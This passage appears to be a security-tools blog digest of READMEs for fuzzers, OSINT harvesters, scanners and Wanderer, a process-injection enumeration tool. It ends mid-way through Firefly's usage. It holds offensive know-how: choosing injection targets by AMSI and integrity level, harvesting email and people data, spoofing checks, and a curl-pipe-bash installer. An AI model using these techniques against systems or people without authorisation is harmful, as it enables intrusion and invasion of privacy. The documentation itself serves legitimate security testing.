"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • A wordlist is a text file in which each line is a path.
  • For extensions, Afuzz replaces the %EXT% keyword with the extensions from the -e flag. If no -e flag is given, the defaults are used.
  • Afuzz can also generate a dictionary based on domain names: it replaces %subdomain% with the host, %rootdomain% with the root domain, %sub% with the subdomain, and %domain% with the domain, and generates entries according to %ext%.

Examples:

  • Normal extensions
index.%EXT%

Passing the asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and the php extension will generate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip
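
To make the substitution rules concrete, here is a minimal Python sketch of the keyword expansion described above. It illustrates the documented behavior only; Afuzz's actual implementation also derives extra %sub% variants (e.g. splitting test-www into test, www and testwww), and the helper name is invented.

from urllib.parse import urlparse

def expand(line, url, extensions):
    host = urlparse(url).hostname            # e.g. test-www.hackerone.com
    parts = host.split(".")
    sub = parts[0]                           # test-www
    rootdomain = ".".join(parts[-2:])        # hackerone.com
    domain = parts[-2]                       # hackerone
    entries = []
    for ext in extensions:
        entries.append(line.replace("%subdomain%", host)
                           .replace("%rootdomain%", rootdomain)
                           .replace("%sub%", sub)
                           .replace("%domain%", domain)
                           .replace("%EXT%", ext)
                           .replace("%ext%", ext))
    return entries

print(expand("%subdomain%.%ext%", "https://test-www.hackerone.com", ["php"]))
# ['test-www.hackerone.com.php']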

Options

[Afuzz ASCII-art banner]



usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples of how to use Afuzz with the most common arguments. For the full list, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --thread) sets the number of separate brute-force workers, so the bigger the thread number, the faster Afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the process.

That said, the speed still depends a lot on the response time of the server. As a warning, we advise you to keep the thread count reasonable, because a very high value can cause a DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter out some pages.

The blacklist.txt file is the same as dirsearch.

The bad_string.txt file is a text file with one rule per line. The format is position==content, with == as the separator; position can be one of: header, body, regex, title.
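
As an illustration, rules in that format could be loaded and applied roughly as follows; this is a sketch of the documented format, not Afuzz's own code.

import re

def load_rules(path):
    rules = []
    with open(path, encoding="utf-8") as f:
        for line in f:
            line = line.strip()
            if line and "==" in line:
                position, content = line.split("==", 1)
                rules.append((position, content))
    return rules

def is_bad(title, headers, body, rules):
    for position, content in rules:
        if position == "title" and content in title:
            return True
        if position == "header" and any(content in v for v in headers.values()):
            return True
        if position == "body" and content in body:
            return True
        if position == "regex" and re.search(content, body):
            return True
    return False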

Language detection

The language.txt file holds the language-detection rules; the format is the same as bad_string.txt. It is used to detect the development language of the website.

References

Thanks to the following open source projects for inspiration:

  • Dirsearch by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


SecuSphere - Efficient DevSecOps

By: Zion3R


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Docker image (from the repository root):

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d securityuniversal/secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.
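
To illustrate this hash-based lookup flow, here is a minimal Python sketch against the public VirusTotal v3 API. It is a simplified illustration of the workflow, not VTScanner's actual code; the API key placeholder and the sample path are assumptions.

import hashlib
import requests

API_KEY = "YOUR_VT_API_KEY"  # placeholder; VTScanner reads its key from config.ini

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def lookup(path):
    r = requests.get(
        f"https://www.virustotal.com/api/v3/files/{sha256_of(path)}",
        headers={"x-apikey": API_KEY},
        timeout=30,
    )
    if r.status_code == 404:
        return f"{path}: not previously scanned on VirusTotal"
    r.raise_for_status()
    stats = r.json()["data"]["attributes"]["last_analysis_stats"]
    return f"{path}: flagged by {stats['malicious']} engines"

print(lookup("sample.bin"))

With a free API key, sleeping between lookups (as the time delay feature below does) keeps you inside VirusTotal's public rate limits.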

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
  • The required packages, installed via: pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



Bryobio - NETWORK Pcap File Analysis

By: Zion3R


Bryobio is a network PCAP file analysis tool, developed to speed up SOC analysts' workflows during analysis.


Tested

  • Debian: OK
  • Ubuntu: OK

Requirements

$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep
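
For context, pyshark is the tshark wrapper that performs the packet dissection. The short sketch below shows the kind of PCAP iteration it enables; it is an illustration with an assumed capture.pcap filename, not Bryobio's own code.

import pyshark

# Open a capture file and summarize the highest-layer protocol of each packet
cap = pyshark.FileCapture("capture.pcap")
protocols = {}
for pkt in cap:
    protocols[pkt.highest_layer] = protocols.get(pkt.highest_layer, 0) + 1
cap.close()

for proto, count in sorted(protocols.items(), key=lambda kv: -kv[1]):
    print(f"{proto}: {count} packets")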

INSTALLATION INSTRUCTIONS

$ git clone https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about their target to build a profile that will later help them identify possible ways to get into an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. The tool retrieves emails, people, files, subdomains, usernames and URLs that are later analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API Keys inside infohound_config.py file

Default modules

InfoHound has two different types of modules: those which retrieve data and those which analyse it to extract more relevant information.

Retrieval modules

  • Get Whois Info: Gets relevant information from the Whois register.
  • Get DNS Records: This task queries the DNS.
  • Get Subdomains: This task uses the Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
  • Get Subdomains From URLs: Once some tasks have been performed, the URLs table will have a lot of entries. This task checks all the URLs to find new subdomains.
  • Get URLs: Searches all URLs cached by the Wayback Machine and saves them into the database. This later helps to discover other data entities like files or subdomains.
  • Get Files from URLs: Loops through the URLs database table to find files and stores them in the Files database table for later analysis. The file types retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar.
  • Find Email: Looks for emails using queries to Google and Bing.
  • Find People from Emails: Once some emails have been found, it can be useful to discover the person behind them. This task also finds usernames for those people.
  • Find Emails From URLs: Sometimes the discovered URLs contain sensitive information. This task retrieves all the emails from URL paths.
  • Execute Dorks: Executes the dorks defined in the dorks folder. Remember to group the dorks by category (filename) to understand their objectives.
  • Find Emails From Dorks: By default, InfoHound has some dorks defined to discover emails. This task looks for them in the results obtained from dork execution.

Analysis

  • Check Subdomains Take-Over: Performs some checks to determine if a subdomain can be taken over.
  • Check If Domain Can Be Spoofed: Checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her (see the sketch after this list).
  • Get Profiles From Usernames: Uses the discovered usernames of each person to find profiles on services or social networks where that username exists. This is performed using the Maigret tool. Note that even if a profile with the same username is found, it does not necessarily belong to the person being analyzed.
  • Download All Files: Once files have been stored in the Files database table, this task downloads them into the "download_files" folder.
  • Get Metadata: Using exiftool, this task extracts all the metadata from the downloaded files and saves it to the database.
  • Get Emails From Metadata: As some metadata can contain emails, this task retrieves all of them and saves them to the database.
  • Get Emails From Files Content: Emails are often included in corporate files, so this task retrieves all the emails from the downloaded files' content.
  • Find Registered Services using Emails: It is possible to find services or social networks where an email has been used to create an account. This task checks if an email InfoHound has discovered has an account on Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
  • Check Breach: Checks the Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it is limited to 10 queries per day. If a Leak-Lookup API key is set, it is checked as well.
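
To illustrate the idea behind the spoofing check: a domain without a strict SPF/DMARC policy can generally be spoofed. Below is a minimal sketch of such a check using dnspython; it shows the general technique, not InfoHound's actual implementation.

import dns.resolver

def txt_records(name):
    try:
        return [r.to_text().strip('"') for r in dns.resolver.resolve(name, "TXT")]
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        return []

def can_be_spoofed(domain):
    spf = [r for r in txt_records(domain) if r.startswith("v=spf1")]
    dmarc = [r for r in txt_records(f"_dmarc.{domain}") if r.startswith("v=DMARC1")]
    # Missing SPF or DMARC, or a DMARC policy of "none", leaves the door open
    if not spf or not dmarc:
        return True
    return any("p=none" in r for r in dmarc)

print(can_be_spoofed("example.com"))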

Custom modules

InfoHound lets you create custom modules; you just need to add your script inside infohound/tool/custom_modules. One custom module has been added as an example: it uses the Holehe tool to check if the previously discovered emails are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by



Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

By: Zion3R


Easy and customisable pentest report creator based on simple web technologies.

SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


Your Benefits

Write in markdown
Design in HTML/VueJS
Render your report to PDF
Fully customizable
Self-hosted or Cloud
No need for Word

SysReptor Cloud

You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

Sign up here


SysReptor Self-Hosted

You prefer self-hosting? That's fine! You will need:

  • Ubuntu
  • Latest Docker (with docker-compose-plugin)

You can then install SysReptor via script:

curl -s https://docs.sysreptor.com/install.sh | bash

After successful installation, access your application at http://localhost:8000/.

Get detailed installation instructions at Installation.





ZeusCloud - Open Source Cloud Security

By: Zion3R


ZeusCloud is an open source cloud security platform.

Discover, prioritize, and remediate your risks in the cloud.

  • Build an asset inventory of your AWS accounts.
  • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
  • Prioritize findings with graphical context.
  • Remediate findings with step by step instructions.
  • Customize security and compliance controls to fit your needs.
  • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

Quick Start

  1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
  2. Run: cd ZeusCloud && make quick-deploy
  3. Visit http://localhost:80

Check out our Get Started guide for more details.

A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

Sandbox

Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

Features

  • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
  • Graphical Context - Understand context behind security findings with graphical visualizations.
  • Access Explorer - Visualize who has access to what with an IAM visualization engine.
  • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
  • Configurability - Configure which security rules are active, which alerts should be muted, and more.
  • Security as Code - Modify rules or write your own with our extensible security as code approach.
  • Remediation - Follow step by step guides to remediate security findings.
  • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

Why ZeusCloud?

Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud, and are both adding new workloads and expanding existing ones. Cloud providers keep increasing their offerings and their complexity. Companies have trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high-profile attacks have occurred in recent times: Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

We had to take action.

  • We noticed traditional cloud security tools are opaque, confusing, time-consuming to set up, and expensive as you scale your cloud environment
  • Cybersecurity vendors inundate security, engineering, and DevOps teams with non-contextual alerts instead of actionable information
  • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
  • Best of all, you can use ZeusCloud for free!

Future Roadmap

  • Integrations with vulnerability scanners
  • Integrations with secret scanners
  • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
  • Support for Azure and GCP environments

Contributing

We love contributions of all sizes. What would be most helpful first:

  • Please give us feedback in our Slack.
  • Open a PR (see our instructions below on developing ZeusCloud locally)
  • Submit a feature request or bug report through Github Issues.

Development

Run containers in development mode:

cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

Reset neo4j and/or postgres data with the following:

rm -rf .compose/neo4j
rm -rf .compose/postgres

To develop on the frontend, make the code changes and save.

To develop on backend, run

docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

To access the UI, go to: http://localhost:80.

Security

Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

Open-source vs. cloud-hosted

This repo is freely available under the Apache 2.0 license.

We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

By: Zion3R


Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.
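
Wanderer itself is written in C#, but to give a feel for the kind of inventory it builds, here is a rough Python sketch using psutil that enumerates processes and flags whether amsi.dll is among their loaded modules. It is Windows-only and approximates just one of Wanderer's checks; it is not the tool's actual code.

import psutil

for proc in psutil.process_iter(["pid", "name"]):
    try:
        # memory_maps() lists files mapped into the process, including DLLs
        modules = [m.path.lower() for m in proc.memory_maps()]
        amsi = any(path.endswith("amsi.dll") for path in modules)
        print(f"{proc.info['pid']:>6} {proc.info['name']:<30} amsi_loaded={amsi}")
    except (psutil.AccessDenied, psutil.NoSuchProcess):
        # Corresponds to Wanderer's access-denied cases (hidden unless included)
        continue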

This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section, which inspired me to build a tool to help me be more efficient during that activity. A special thanks goes out to ShadowKhan, who provided valuable feedback that helped give creative direction to make this utility visually appealing and enhanced its usability with suggested filtering capabilities.


Usage

PS C:\> .\wanderer.exe

>> Process Injection Enumeration
>> https://github.com/gh0x0st

Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

Target Options:

-i, --id, Target a single or group of processes by their id number
-n, --name, Target a single or group of processes by their name
-c, --current, Target the current process and reveal the current privilege level
-a, --all, Target every running process

Filter Options:

--include-denied, Include instances where process access is denied
--exclude-32, Exclude instances where the process architecture is 32-bit
--exclude-64, Exclude instances where the process architecture is 64-bit
--exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module
--exclude-amsiunloaded, Exclude instances where amsi.dll is not a loaded process module
--exclude-integrity, Exclude instances where the process integrity level is a specific value

Output Options:

--output-nested, Output the results in a nested style view
-q, --quiet, Do not output the banner

Examples:

Enumerate the process with id 12345
C:\> wanderer --id 12345

Enumerate all processes with the names process1 and processs2
C:\> wanderer --name process1,process2

Enumerate the current process privilege level
C:\> wanderer --current

Enumerate all 32-bit processes
C:\> wanderer --all --exclude-64

Enumerate all processes where AMSI is loaded
C:\> wanderer --all --exclude-amsiunloaded

Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32

Screenshots

Example 1

Example 2

Example 3

Example 4

Example 5



Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R


This tool is very helpful for finding vulnerabilities present in web applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generating malicious inputs and evaluating the application's responses.
    • These scanners are automated tools that scan web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc. in order to scan ports, sites, hosts and networks to find vulnerabilities like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

  1. whatweb
  2. nmap
  3. golismero
  4. host
  5. wget
  6. uniscan
  7. wafw00f
  8. dirb
  9. davtest
  10. theharvester
  11. xsser
  12. fierce
  13. dnswalk
  14. dnsrecon
  15. dnsenum
  16. dnsmap
  17. dmitry
  18. nikto
  19. whois
  20. lbd
  21. wapiti
  22. devtest
  23. sslyze

Working

Phase 1

  • The user has to run: python3 web_scan.py (https or http)://example.com
  • At first the program notes the initial run time, then it builds the URL as "www.example.com".
  • After this step the system checks the internet connection using ping.
  • Functionalities:
    • To open the help menu, use --help; to update, use --update
    • If the user wants to skip the current scan/test: CTRL+C
    • To quit the scanner: CTRL+Z
    • The program reports the scanning time taken by the tool for each specific test.

Phase 2

  • From here the main function of the scanner starts:
  • The scanner automatically selects a tool to start scanning with.
  • Scanners to be used and filename rotation (default: enabled)
  • The command used to initiate each tool (with parameters and extra params) is already given in the code
  • After finding a vulnerability in the web application, the scanner classifies it in a specific format:
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c (critical) marks the most severe findings, whereas l (low) marks the least vulnerable systems

Definitions:-

  • Critical: Vulnerabilities that score in the critical range usually have most of the following characteristics: exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices, and exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High: An attacker can fully compromise the confidentiality, integrity or availability of a target system without specialized access, user interaction or circumstances that are beyond the attacker's control. Very likely to allow lateral movement and escalation of the attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in significant data loss or downtime.

  • Medium: An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack. This includes vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics, denial of service vulnerabilities that are difficult to set up, exploits that require an attacker to reside on the same local network as the victim, vulnerabilities where exploitation provides only very limited access, and vulnerabilities that require user privileges for successful exploitation.

  • Low: An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control are required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info: An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information an attacker obtains might be used to craft a more accurate attack at a later date. It is recommended to restrict any information disclosure as far as possible.

  • CVSS v3 score range and severity in advisory (see the helper below):
    0.1 - 3.9: Low
    4.0 - 6.9: Medium
    7.0 - 8.9: High
    9.0 - 10.0: Critical
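
As a quick illustration of that mapping, a small Python helper (illustrative only):

def severity(cvss_v3_score: float) -> str:
    """Map a CVSS v3 base score to the advisory severity used above."""
    if cvss_v3_score >= 9.0:
        return "Critical"
    if cvss_v3_score >= 7.0:
        return "High"
    if cvss_v3_score >= 4.0:
        return "Medium"
    if cvss_v3_score >= 0.1:
        return "Low"
    return "None"

print(severity(7.5))  # High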

Vulnerabilities

  • After this the scanner will show results, which include:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now the scanner will describe the harmful effects of that specific type of vulnerability.
  • The scanner points to sources (websites) where you can learn more about the vulnerabilities.
  • After this step, the scanner suggests some remedies to overcome the vulnerabilities.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerability.
  • Writes all scan output into SA-Debug-ScanLog, under the same directory, for debugging purposes
  • For debugging, you can view the complete output generated by all the tools in SA-Debug-ScanLog.

Use

Use the program as: python3 web_scan.py (https or http)://example.com
--help
--update
Vulnerabilities to scan:

  1. IPv6
  2. Wordpress
  3. SiteMap/Robot.txt
  4. Firewall
  5. Slowloris Denial of Service
  6. HEARTBLEED
  7. POODLE
  8. OpenSSL CCS Injection
  9. FREAK
  10. Firewall
  11. LOGJAM
  12. FTP Service
  13. STUXNET
  14. Telnet Service
  15. LOG4j
  16. Stress Tests
  17. WebDAV
  18. LFI, RFI or RCE
  19. XSS, SQLi, BSQL
  20. XSS Header not present
  21. Shellshock Bug
  22. Leaks Internal IP
  23. HTTP PUT DEL Methods
  24. MS10-070
  25. Outdated
  26. CGI Directories
  27. Interesting Files
  28. Injectable Paths
  29. Subdomains
  30. MS-SQL DB Service
  31. ORACLE DB Service
  32. MySQL DB Service
  33. RDP Server over UDP and TCP
  34. SNMP Service
  35. Elmah
  36. SMB Ports over TCP and UDP
  37. IIS WebDAV
  38. X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions, feature requests and bug reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub: @nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



Firefly - Black Box Fuzzer For Web Applications

By: Zion3R

Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

Note:

Firefly is at a very early stage (v1.0) but works well for now, provided the target does not contain too much dynamic content. Firefly does detect and filter dynamic changes, but not yet perfectly.

 

Advantages

  • Heavy use of goroutines and internal hardware for great performance
  • Built-in engine that handles each task for "x" response results inductively
  • Highly customizable to handle more complex fuzzing
  • Filter options and request verifications to avoid junk results
  • Friendly error and debug output
  • Built-in payloads (the default list is mixed with wordlists from SecLists)
  • Payload tampering and encoding functionality

Features


Installation

go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

If the above install method does not work, try the following:

git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Usage

Simple

firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Advanced usage

Request

Different types of request input that can be used

Basic

